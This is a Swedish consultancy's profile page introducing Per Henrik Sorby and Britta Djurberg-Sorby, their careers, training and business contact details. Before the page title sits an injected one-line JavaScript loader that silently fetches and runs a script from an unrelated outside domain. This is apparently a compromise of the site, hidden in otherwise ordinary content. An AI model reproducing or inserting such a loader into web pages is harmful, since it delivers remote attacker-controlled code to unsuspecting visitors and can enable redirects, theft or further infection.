;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Om Per Henrik och Britta | Sorby Gård
Per Henrik Sorby

Per Henrik Sorby

Per Henrik arbetar som konsult sedan 1990 i företaget Sorby Gård Organisationskonsult. Per Henrik är en erfaren processkonsult med lång pedagogisk erfarenhet. Han har arbetat med ledningsutveckling, ledarskap, teamutveckling och förändringsarbete i över tjugo år.

Per Henrik har tidigare varit verksam som yrkesofficer och reservofficer. Han har också arbetat som gymnasielärare och är beteendevetare med psykologi, sociologi och pedagogik i grunden.

Förutom utbildning till kvalificerad organisationskonsult är Per Henrik också utbildad UGL-handledare, certifierad IDI-handledare och har även en grundutbildning i gestaltterapi.

Telefon: 0708-27 22 36
E-post: info@sorbygard.se

Britta Djurberg-Sorby

Britta Djurberg-Sorby

Britta arbetar som konsult sedan 1992 i företaget Sorby Gård Organisationskonsult. Britta har en gedigen grund som utbildad journalist, vid Journalisthögskolan i Göteborg . Hon har bl.a femton års erfarenhet från arbete med tidningar och radio.

Britta är en erfaren processkonsult och har efter genomgången utbildning till kvalificerad organisationskonsult, under de senaste femton åren arbetat med ledarutveckling, teamutveckling och ledarskapsutbildning.

Hon arbetar även framgångsrikt med intervjuer, kartläggning och analys i företag och organisationer.

Britta är certifierad IDI-handledare och har även pedagogisk utbildning avseende praktisk pedagogik och vuxenpedagogik.

Telefon: 0709-78 44 77
E-post: info@sorbygard.se